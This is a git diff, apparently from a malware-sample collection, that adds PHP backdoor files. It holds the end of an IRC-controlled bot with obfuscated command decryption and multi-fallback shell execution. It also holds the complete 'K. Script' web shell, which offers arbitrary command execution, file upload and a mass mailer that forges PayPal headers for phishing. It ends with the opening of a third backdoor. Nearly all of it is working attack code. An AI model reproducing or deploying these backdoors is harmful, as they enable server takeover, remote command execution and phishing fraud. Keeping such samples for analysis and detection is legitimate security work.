|
|
||||||
|
$last_line = $line;
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($socket);
|
||||||
|
sleep(3);
|
||||||
|
connect();
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
shuffle($servers);
|
||||||
|
connect();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function write_file($handle, $text)
|
||||||
|
{
|
||||||
|
fwrite($handle, "$text\r\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
function send_irc_message($socket, $silent, $target, $text)
|
||||||
|
{
|
||||||
|
if ($silent != TRUE) {
|
||||||
|
// UFJJVk1TRw==: PRIVMSG
|
||||||
|
write_file($socket, decode("UFJJVk1TRw=="). " $target :$text");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function decrypt_command($input)
|
||||||
|
{
|
||||||
|
$output = '';
|
||||||
|
$input = base64_decode($input);
|
||||||
|
|
||||||
|
for ($i = 0; $i < strlen($input); $i++) {
|
||||||
|
$character = substr($input, $i, 1);
|
||||||
|
// NDU...: 4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D
|
||||||
|
// Strlen: 107
|
||||||
|
$offset_character = substr(
|
||||||
|
decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDM" .
|
||||||
|
"yJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="),
|
||||||
|
($i % strlen(decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKk" .
|
||||||
|
"AhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="))) - 1,
|
||||||
|
1
|
||||||
|
);
|
||||||
|
$character = chr(ord($character) - ord($offset_character));
|
||||||
|
$output .= $character;
|
||||||
|
}
|
||||||
|
return $output;
|
||||||
|
}
|
||||||
|
|
||||||
|
function generate_nick($length)
|
||||||
|
{
|
||||||
|
$return = '';
|
||||||
|
|
||||||
|
for ($i = 0; $i < $length; $i++) {
|
||||||
|
$return .= chr(mt_rand(0, 25) + 97);
|
||||||
|
}
|
||||||
|
if (posix_getegid() == 0) {
|
||||||
|
$return = "r-" . $t2cb9df9898e55;
|
||||||
|
}
|
||||||
|
return $return;
|
||||||
|
}
|
||||||
|
|
||||||
|
function execute($command)
|
||||||
|
{
|
||||||
|
$output = '';
|
||||||
|
|
||||||
|
if (!empty($command)) {
|
||||||
|
if (function_exists('exec')) {
|
||||||
|
@exec($command, $output);
|
||||||
|
$output = join("\n", $output);
|
||||||
|
}
|
||||||
|
elseif (function_exists('shell_exec')) {
|
||||||
|
$output = @shell_exec($command);
|
||||||
|
}
|
||||||
|
elseif (function_exists('system')) {
|
||||||
|
@ob_start();
|
||||||
|
@system($command);
|
||||||
|
$output = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif (function_exists('passthru')) {
|
||||||
|
@ob_start();
|
||||||
|
@passthru($command);
|
||||||
|
$output = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif (@is_resource($handle = @popen($command, "r"))) {
|
||||||
|
$output = "";
|
||||||
|
|
||||||
|
while (!@feof($handle)) {
|
||||||
|
$output .= @fread($handle, 1024);
|
||||||
|
}
|
||||||
|
|
||||||
|
@pclose($handle);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return $output;
|
||||||
|
}
|
||||||
|
|
||||||
|
function decrypt_settings($input)
|
||||||
|
{
|
||||||
|
$output = '';
|
||||||
|
$input = base64_decode($input);
|
||||||
|
|
||||||
|
for ($i = 0; $i < strlen($input); $i++) {
|
||||||
|
$character = substr($input, $i, 1);
|
||||||
|
// M0A...: 3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE
|
||||||
|
// Strlen: 113
|
||||||
|
$offset_character = substr(
|
||||||
|
decode("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUj" .
|
||||||
|
"JCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="),
|
||||||
|
($i % strlen(decode("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQ" .
|
||||||
|
"hQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="))) - 1,
|
||||||
|
1
|
||||||
|
);
|
||||||
|
$character = chr(ord($character) - ord($offset_character));
|
||||||
|
$output .= $character;
|
||||||
|
}
|
||||||
|
return $output;
|
||||||
|
}
|
||||||
|
|
||||||
|
function generate_user($length)
|
||||||
|
{
|
||||||
|
$return = "";
|
||||||
|
|
||||||
|
for ($i = 0; $i < $length; $i++) {
|
||||||
|
$return .= chr(mt_rand(0, 25) + 97);
|
||||||
|
}
|
||||||
|
return $return;
|
||||||
|
}
|
||||||
|
|
||||||
|
connect();
|
||||||
|
?>
|
402
PHP/Backdoor.PHP.KScr.e
Normal file
402
PHP/Backdoor.PHP.KScr.e
Normal file
@ -0,0 +1,402 @@
|
|||||||
|
<?php
|
||||||
|
$Title = "K. Script v0.3 Beta By $alla$$: ";
|
||||||
|
$GraphicHeader = '<meta http-equiv="Content-Type" content="text/html; charset=windows-1257">
|
||||||
|
<style type="text/css">
|
||||||
|
body{ background-color: #F6F6F6; text-align: center; width: 100%; padding: 0px; margin: 0px; }
|
||||||
|
#unCenter{ width: 300px; margin-left: auto; margin-right: auto; text-align: left; }
|
||||||
|
#unCenterShell{ width: 600px; margin-left: auto; margin-right: auto; text-align: left; }
|
||||||
|
#unCenterMailer{ width: 700px; margin-left: auto; margin-right: auto; text-align: left; }
|
||||||
|
#unCenterProxy{ width: 750px; margin-left: auto; margin-right: auto; }
|
||||||
|
#unCenterHeader{ width: 800px; margin-left: auto; margin-right: auto; text-align: center; }
|
||||||
|
.Marged{ margin-top: 20px; }
|
||||||
|
.Input{ border: 1px solid #DADADA; }
|
||||||
|
.Table{ border: 1px solid #DADADA; background-color: White; padding: 10px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; }
|
||||||
|
.TableHeader{ border: 1px solid #DADADA; background-color: White; padding: 2px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; }
|
||||||
|
a{ text-decoration: none; color: #003473; }
|
||||||
|
a:hover{ text-decoration: none; color: #F5822B;}
|
||||||
|
img{ border: 0px; }
|
||||||
|
h1{ font-size: 14px; font-weight: bold; padding: 0px; margin-bottom: 7px; }
|
||||||
|
.Black{ color: Gray; font: 11px Tahoma, Verdana, sans-serif; }
|
||||||
|
.BlackRealy{ color: Black; font: 12px Tahoma, Verdana, sans-serif; }
|
||||||
|
</style>';
|
||||||
|
$SiteHeader = '</head><body><br>
|
||||||
|
<a href="?MainPage"><img src="http://kenshin-lt.net/images/fuck.gif" width="50" height="50" alt="Home"></a>
|
||||||
|
<div><hr width="90%" size="1.5px" noshade="noshade"></div>';
|
||||||
|
$GraphicFooter = '<div><br><hr width="90%" size="1.5px" noshade="noshade"></div>
|
||||||
|
<div align="center" class="black">[<a href="?ProxyDetect">ProxyDetect</a>]
|
||||||
|
<span class="BlackRealy"> | </span>[<a href="?Uploader">FileUploader</a>]
|
||||||
|
<span class="BlackRealy"> | </span>[<a href="?PHPShell">PHPShell</a>]
|
||||||
|
<span class="BlackRealy"> | </span>[<a href="?PortCheck">PortCheck</a>]
|
||||||
|
<span class="BlackRealy"> | </span>[<a href="?Mailer">MassMailer</a>]
|
||||||
|
<span class="BlackRealy"> | </span>[<a href="?DeleteMe">Delete Me</a>]</div>
|
||||||
|
<div align="center" class="Black">Copyright © 2007 <a href="mailto:shaun.wades@gmail.com">Shaun$$</a></div>
|
||||||
|
</body></html>';
|
||||||
|
$Slash = '/';
|
||||||
|
|
||||||
|
if ($_SERVER['QUERY_STRING'] == '') header("Location: http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?MainPage");
|
||||||
|
|
||||||
|
if(isset($_GET['PHPShell'])) {
|
||||||
|
$passwd = array();
|
||||||
|
$aliases = array();
|
||||||
|
session_start();
|
||||||
|
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
|
||||||
|
$_SESSION['cwd'] = getcwd();
|
||||||
|
$_SESSION['history'] = array();
|
||||||
|
$_SESSION['output'] = '';
|
||||||
|
}
|
||||||
|
if (!empty($_REQUEST['command'])) {
|
||||||
|
if (get_magic_quotes_gpc()) {
|
||||||
|
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
|
||||||
|
}
|
||||||
|
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
|
||||||
|
unset($_SESSION['history'][$i]);
|
||||||
|
array_unshift($_SESSION['history'], $_REQUEST['command']);
|
||||||
|
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
|
||||||
|
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
||||||
|
$_SESSION['cwd'] = dirname(__FILE__);
|
||||||
|
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
|
||||||
|
if ($regs[1][0] == '/') {
|
||||||
|
$new_dir = $regs[1];
|
||||||
|
} else {
|
||||||
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||||
|
}
|
||||||
|
while (strpos($new_dir, '/./') !== false)
|
||||||
|
$new_dir = str_replace('/./', '/', $new_dir);
|
||||||
|
while (strpos($new_dir, '//') !== false)
|
||||||
|
$new_dir = str_replace('//', '/', $new_dir);
|
||||||
|
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||||
|
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||||
|
if ($new_dir == '') $new_dir = '/';
|
||||||
|
if (@chdir($new_dir)) {
|
||||||
|
$_SESSION['cwd'] = $new_dir;
|
||||||
|
} else {
|
||||||
|
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
chdir($_SESSION['cwd']);
|
||||||
|
$length = strcspn($_REQUEST['command'], " \t");
|
||||||
|
$token = substr($_REQUEST['command'], 0, $length);
|
||||||
|
if (isset($aliases[$token]))
|
||||||
|
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
|
||||||
|
$p = proc_open($_REQUEST['command'],
|
||||||
|
array(1 => array('pipe', 'w'),
|
||||||
|
2 => array('pipe', 'w')),
|
||||||
|
$io);
|
||||||
|
while (!feof($io[1])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
while (!feof($io[2])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
fclose($io[1]);
|
||||||
|
fclose($io[2]);
|
||||||
|
proc_close($p);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if (empty($_SESSION['history'])) {
|
||||||
|
$js_command_hist = '""';
|
||||||
|
} else {
|
||||||
|
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||||
|
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
echo '<xml version="1.0" encoding="UTF-8">';
|
||||||
|
echo '<html><head><title>'.$Title.' PHPShell</title>';
|
||||||
|
echo $GraphicHeader;
|
||||||
|
?>
|
||||||
|
|
||||||
|
<script type="text/javascript" language="JavaScript">
|
||||||
|
var current_line = 0;
|
||||||
|
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||||
|
var last = 0;
|
||||||
|
function key(e) {
|
||||||
|
if (!e) var e = window.event;
|
||||||
|
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line++;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
if (e.keyCode == 40 && current_line > 0) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line--;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
function init() {
|
||||||
|
document.shell.setAttribute("autocomplete", "off");
|
||||||
|
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||||
|
document.shell.command.focus();
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
<? echo $SiteHeader; ?>
|
||||||
|
<body onload="init()">
|
||||||
|
<?php
|
||||||
|
error_reporting (E_ALL);
|
||||||
|
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
|
||||||
|
?>
|
||||||
|
<div id="unCenterShell"><div class="Marged"><div class="Table">
|
||||||
|
<center><div>Current Directory: <?php echo $_SESSION['cwd'] ?></div></center>
|
||||||
|
</div></div></div>
|
||||||
|
|
||||||
|
<div id="unCenterShell"><div class="Marged"><div class="Table"><center>
|
||||||
|
<div><form name="shell" action="<?php echo $_SERVER['PHP_SELF'] .'?PHPShell'?>" method="post"></div>
|
||||||
|
<div><textarea class="Input" name="output" readonly="readonly" cols="68" rows="<?php echo $_REQUEST['rows'] ?>">
|
||||||
|
<?php
|
||||||
|
$lines = substr_count($_SESSION['output'], "\n");
|
||||||
|
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
|
||||||
|
echo rtrim($padding . $_SESSION['output']);
|
||||||
|
?>
|
||||||
|
</textarea></div>
|
||||||
|
<div>$ <input class="Input" name="command" type="text" onkeyup="key(event)" size="89" tabindex="1"><div>
|
||||||
|
</center></div></div></div>
|
||||||
|
|
||||||
|
|
||||||
|
<div id="unCenter"><div class="Marged"><div class="Table"><center>
|
||||||
|
<div><input type="submit" value="Execute Command" /> <input type="submit" name="reset" value="Reset" /></div>
|
||||||
|
<div>Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" /></div>
|
||||||
|
</form></center></div></div></div>
|
||||||
|
<? echo $GraphicFooter; }
|
||||||
|
|
||||||
|
|
||||||
|
if(isset($_GET['Uploader'])){
|
||||||
|
echo '<html><head><title>'.$Title.' Uploader</title>';
|
||||||
|
echo $GraphicHeader; echo $SiteHeader;
|
||||||
|
|
||||||
|
if(isset($_POST['upl_files'])){
|
||||||
|
echo '<div id="unCenter"><div class="Marged"><div class="Table">
|
||||||
|
<div>Uploaded Files:<br></div>';
|
||||||
|
//print_r($_FILES['file_n']);
|
||||||
|
$up_mas = $_FILES['file_n'];
|
||||||
|
$mas_name = array();
|
||||||
|
$mas_tmp = array();
|
||||||
|
for($i=0; $i<10; $i++){
|
||||||
|
if(!empty($up_mas['name'][$i])){
|
||||||
|
$j = count($mas_name);
|
||||||
|
$mas_name[$j] = $up_mas['name'][$i];
|
||||||
|
$mas_tmp[$j] = $up_mas['tmp_name'][$i];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for($i=0; $i<count($mas_name); $i++){
|
||||||
|
$upl_file = $_POST['mas_dir'].$mas_name[$i];
|
||||||
|
if(move_uploaded_file($mas_tmp[$i], $upl_file)){
|
||||||
|
echo '<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a>, ';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</div></div></div>";
|
||||||
|
?>
|
||||||
|
<div id="unCenter"><div class="Marged"><div class="Table"><center><br>
|
||||||
|
<form enctype="multipart/form-data" method="post" action="">
|
||||||
|
<div>Upload Files to:
|
||||||
|
<? echo'<input class="input" type="text" name="mas_dir" value='.getcwd().$Slash.' size="40"><br><br>'; ?>
|
||||||
|
<? for($i=0; $i<10; $i++){ echo '<div><input class="Input" type="file" name="file_n[]"></div>'; } ?>
|
||||||
|
</div><div><input type="reset" name="reset" value="Reset"> <input type="submit" name="upl_files" value="upload"></div>
|
||||||
|
</center></div></div></div>
|
||||||
|
<? echo $GraphicFooter; }
|
||||||
|
|
||||||
|
|
||||||
|
if(isset($_GET['MainPage'])){
|
||||||
|
echo '<html><head><title>'.$Title.'</title>';
|
||||||
|
echo $GraphicHeader; echo $SiteHeader;
|
||||||
|
|
||||||
|
print "<div id=unCenterHeader><div class=TableHeader>";
|
||||||
|
print((@ini_get('safe_mode'))?("<b>Safe Mode: <font color=green>ON</font><b>"):("<b>Safe Mode: <font color=red>OFF</font>"));
|
||||||
|
print "</b><span class=BlackRealy> | </span>";
|
||||||
|
print "<b>PHP version: <font color=green>".@phpversion()."</font></b>";
|
||||||
|
print "<span class=BlackRealy> | </span>";
|
||||||
|
print((@function_exists('curl_version'))?("<b>cURL: <font color=green>ON</font>"):("<b>cURL: <font color=red>OFF</font>"));
|
||||||
|
print "</b><span class=BlackRealy> | </span>";
|
||||||
|
if(@function_exists('mysql_connect')){ echo "<b>MySQL: <font color=green>ON</font>"; } else { echo "<b>MySQL: <font color=red>OFF</font>"; }
|
||||||
|
print "</b><span class=BlackRealy> | </span>";
|
||||||
|
if(@function_exists('mssql_connect')){ echo "<b>MSSQL: <font color=green>ON</font>"; } else { echo "<b>MSSQL: <font color=red>OFF</font>"; }
|
||||||
|
print "</b><span class=BlackRealy> | </span>";
|
||||||
|
if(@function_exists('pg_connect')){ echo "<b>PostgreSQL: <font color=green>ON</font>"; } else { echo "<b>PostgreSQL: <font color=red>OFF</font>";}
|
||||||
|
print "</b><span class=BlackRealy> | </span>";
|
||||||
|
if(@function_exists('ocilogon')){ echo "<b>Oracle: <font color=green>ON</font>"; } else { echo "<b>Oracle: <font color=red>OFF</font>"; }
|
||||||
|
print "</b></b></div></div>";
|
||||||
|
|
||||||
|
echo<<<MainPageGraphic
|
||||||
|
<div id="unCenter">
|
||||||
|
<div class="Marged">
|
||||||
|
<div class="Table">
|
||||||
|
<center>
|
||||||
|
<div></div>
|
||||||
|
<div><a href="?ProxyDetect">ProxyDetect</a></div>
|
||||||
|
<div><a href="?Uploader">FileUploader</a></div>
|
||||||
|
<div><a href="?PHPShell">PHPShell</a></div>
|
||||||
|
<div><a href="?PortCheck">PortCheck</a></div>
|
||||||
|
<div><a href="?Mailer">MassMailer</a></div>
|
||||||
|
<div><hr width="150px" size="1px" noshade="noshade"></div>
|
||||||
|
<div><a href="?DeleteMe">Delete me</a></div>
|
||||||
|
</center>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
MainPageGraphic;
|
||||||
|
echo $GraphicFooter; }
|
||||||
|
|
||||||
|
|
||||||
|
if(isset($_GET['PortCheck'])) {
|
||||||
|
echo '<html><head><title>'.$Title.' PortCheck</title>';
|
||||||
|
echo $GraphicHeader; echo $SiteHeader;
|
||||||
|
echo "<div id=\"unCenter\"><div class=\"Marged\"><div class=\"Table\" style=\"padding-left: 20\">";
|
||||||
|
echo "<div align=\"center\">Under Reconstruction</div>";
|
||||||
|
echo "</div></div></div>";
|
||||||
|
echo $GraphicFooter;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(isset($_GET['Mailer'])) {
|
||||||
|
echo '<html><head><title>'.$Title.' Mailer</title>';
|
||||||
|
echo $GraphicHeader;
|
||||||
|
echo $SiteHeader;
|
||||||
|
|
||||||
|
if(!$action) $action = "";
|
||||||
|
|
||||||
|
if ($action=="send"){
|
||||||
|
$message = urlencode($message);
|
||||||
|
$message = ereg_replace("%5C%22", "%22", $message);
|
||||||
|
$message = urldecode($message);
|
||||||
|
$message = stripslashes($message);
|
||||||
|
$subject = stripslashes($subject);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<!-- Mailer -->
|
||||||
|
<form name="Mailer" method="post" action="<? echo $_SERVER['PHP_SELF'] . '?Mailer' ?>" enctype="multipart/form-data">
|
||||||
|
|
||||||
|
<div id="unCenterMailer"><div class="Marged"><div class="Table">
|
||||||
|
<div align="left">
|
||||||
|
<div style="padding-left: 20px;">Your Email: <input class="input" type="text" name="from" value="<?=$from?>" size="20">
|
||||||
|
<span style="padding-left: 122px;"></span>Your Name: <input class="input" type="text" name="realname" value="<?=$realname?>" size="20"></div>
|
||||||
|
<div style="padding-left: 26px;">Reply-To: <input class="input" type="text" name="replyto" value="<?=$replyto?>" size="20">
|
||||||
|
<span style="padding-left: 123px;"></span>Attach File: <input class="input" type="file" name="file" size="20"></div>
|
||||||
|
<div style="padding-left: 33px;">Subject: <input class="input" type="text" name="subject" value="<?=$subject?>" size="90"></div>
|
||||||
|
</div>
|
||||||
|
<div align="left"><span style="padding-left: 4px;"></span>Letter:<span style="padding-left: 392px;"></span>Recipients:</div>
|
||||||
|
<div><textarea class="input" name="message" cols="50" rows="10"><?=$message?></textarea>
|
||||||
|
<textarea class="input" name="emaillist" cols="25" rows="10"><?=$emaillist?></textarea></div>
|
||||||
|
</div></div></div>
|
||||||
|
|
||||||
|
<div id="unCenter"><div class="Marged"><div class="Table">
|
||||||
|
<div align="center"><input type="radio" name="contenttype" value="plain">Plain
|
||||||
|
<input type="radio" name="contenttype" value="html" checked>HTML
|
||||||
|
<input type="hidden" name="action" value="send"><input class="input" type="submit" value="Send eMails"></div>
|
||||||
|
</div></div></div></form>
|
||||||
|
<?
|
||||||
|
if ($action=="send"){
|
||||||
|
|
||||||
|
if (!$from && !$subject && !$message && !$emaillist){
|
||||||
|
echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>
|
||||||
|
<div>Please complete all fields before sending your message.</div>
|
||||||
|
</center></div></div></div>';
|
||||||
|
echo $GraphicFooter;
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
|
||||||
|
$allemails = split("\n", $emaillist);
|
||||||
|
$numemails = count($allemails);
|
||||||
|
|
||||||
|
If ($file_name){
|
||||||
|
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
|
||||||
|
$content = fread(fopen($file,"r"),filesize($file));
|
||||||
|
$content = chunk_split(base64_encode($content));
|
||||||
|
$uid = strtoupper(md5(uniqid(time())));
|
||||||
|
$name = basename($file);
|
||||||
|
}
|
||||||
|
echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>';
|
||||||
|
|
||||||
|
$messid = "1140150615.28818";
|
||||||
|
|
||||||
|
for($x=0; $x<$numemails; $x++){
|
||||||
|
$to = $allemails[$x];
|
||||||
|
if ($to){
|
||||||
|
$to = ereg_replace(" ", "", $to);
|
||||||
|
$message = ereg_replace("&email&", $to, $message);
|
||||||
|
$subject = ereg_replace("&email&", $to, $subject);
|
||||||
|
print "Sending: [ $to ] ";
|
||||||
|
flush();
|
||||||
|
$header = "From: $realname <$from>\r\n";
|
||||||
|
$header .= "Reply-To: $replyto\r\n";
|
||||||
|
$header .= "MIME-Version: 1.0\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
|
||||||
|
If ($file_name) $header .= "--$uid\r\n";
|
||||||
|
$header .= "Message-Id:<$messid@paypal.com>\r\n";
|
||||||
|
$header .= "Return-Path: <service@paypal.com>\r\n";
|
||||||
|
$header .= "Content-Type: text/$contenttype\r\n";
|
||||||
|
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
|
||||||
|
$header .= "$message\r\n";
|
||||||
|
If ($file_name) $header .= "--$uid\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
|
||||||
|
If ($file_name) $header .= "$content\r\n";
|
||||||
|
If ($file_name) $header .= "--$uid--";
|
||||||
|
mail($to, $subject, "", $header);
|
||||||
|
print "........Success!<br>";
|
||||||
|
flush();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</center></div></div></div>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<!-- </Mailer> -->
|
||||||
|
<? echo $GraphicFooter; } ?>
|
||||||
|
|
||||||
|
<? if(isset($_GET['DeleteMe'])){
|
||||||
|
echo '<html><head><title>'.$Title.' DeleteMe</title>';
|
||||||
|
echo $GraphicHeader; echo $SiteHeader;
|
||||||
|
$del = $_GET['del'];
|
||||||
|
if($del=="TRUE"){
|
||||||
|
$url = "http://" .$_SERVER['HTTP_HOST']. "/";
|
||||||
|
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL= $url \">";
|
||||||
|
unlink('kscr.php');
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
<div id="unCenter"><div class="Marged"><div class="Table">
|
||||||
|
<center><div></div>
|
||||||
|
<div style="font-size 10px: bold; font-weight: bold;">Delete Me?</div>
|
||||||
|
<br><div><a href="?DeleteMe&del=TRUE">Yes (Delete)</a><img src="" border="0" height="0" width="50"><a href="?MainPage">No (Go Home)</a></div>
|
||||||
|
</center></div></div></div>
|
||||||
|
|
||||||
|
<? echo $GraphicFooter; } ?>
|
||||||
|
|
||||||
|
<? if(isset($_GET['ProxyDetect'])){
|
||||||
|
echo $GraphicHeader; echo $SiteHeader;
|
||||||
|
echo '<html><head><title>'.$Title.' ProxyDetect</title>';
|
||||||
|
?>
|
||||||
|
|
||||||
|
<div id="unCenterProxy"><div class="Marged"><div class="Table">
|
||||||
|
<div class="Menu" align=center><b><u>Your IP Address:</u></b><br><br></div>
|
||||||
|
|
||||||
|
<?
|
||||||
|
$proxy = "";
|
||||||
|
$viaproxy = "";
|
||||||
|
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $proxy = TRUE;
|
||||||
|
if($proxy) $viaproxy = "Via Proxy";
|
||||||
|
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||||
|
$ip = getenv("REMOTE_ADDR");
|
||||||
|
if($host==$ip) $host = "N/A";
|
||||||
|
echo "<div align=center ><b>".$ip." (".$host.")</b>".$viaproxy."</div>";
|
||||||
|
?>
|
||||||
|
|
||||||
|
<hr size=1 width=80%><br>
|
||||||
|
<div class=Menu align=center><b><u>Your HTTP Headers:</u></b><br><br/></div>
|
||||||
|
<div align="left" style="padding-left: 10px">
|
||||||
|
<?
|
||||||
|
if(!empty($_SERVER['HTTP_CONNECTION'])) echo "<li> <span style=\"color: Black;\">HTTP_CONNECTION: </span><b>".$_SERVER['HTTP_CONNECTION']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_KEEP_ALIVE'])) echo "<li> <span style=\"color: Black;\">HTTP_KEEP_ALIVE: </span><b>".$_SERVER['HTTP_KEEP_ALIVE']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_ACCEPT'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT: </span><b>".$_SERVER['HTTP_ACCEPT']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_ACCEPT_CHARSET'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_CHARSET: </span><b>".$_SERVER['HTTP_ACCEPT_CHARSET']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_ACCEPT_ENCODING'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_ENCODING: </span><b>".$_SERVER['HTTP_ACCEPT_ENCODING']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_LANGUAGE: </span><b>".$_SERVER['HTTP_ACCEPT_LANGUAGE']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_HOST'])) echo "<li> <span style=\"color: Black;\">HTTP_HOST: </span><b>".$_SERVER['HTTP_HOST']."</b><br>";
|
||||||
|
if(!empty($_SERVER['HTTP_USER_AGENT'])) echo "<li> <span style=\"color: Black;\">HTTP_USER_AGENT: </span><b>".$_SERVER['HTTP_USER_AGENT']."</b><br>";
|
||||||
|
if($proxy) echo "<li> <span style=\"color: Black;\">HTTP_X_FORWARDED_FOR: </span><b>".$_SERVER['HTTP_X_FORWARDED_FOR']."</b><br>";
|
||||||
|
if (($proxy) && (!empty($_SERVER['HTTP_VIA']))){ echo "<li> <span style=\"color: Black;\">HTTP_VIA: </span><b>".$_SERVER['HTTP_VIA']."</b><br>"; }
|
||||||
|
?>
|
||||||
|
</div></div></div></div>
|
||||||
|
|
||||||
|
<? echo $GraphicFooter; } exit;?>
|
295
PHP/Backdoor.PHP.Lanker.a
Normal file
295
PHP/Backdoor.PHP.Lanker.a
Normal file
@ -0,0 +1,295 @@
|
|||||||
|
|
||||||
|
<HTML><HEAD>
|
||||||
|
<!-- codz by Lanker(QQ:18779569)、孟兄(QQ:80607005) 2004/12/22-->
|
||||||
|
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
|
||||||
|
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
|
||||||
|
<style>
|
||||||
|
<!--
|
||||||
|
td {font-size:8pt; color: #666666;font-family:Verdana}
|
||||||
|
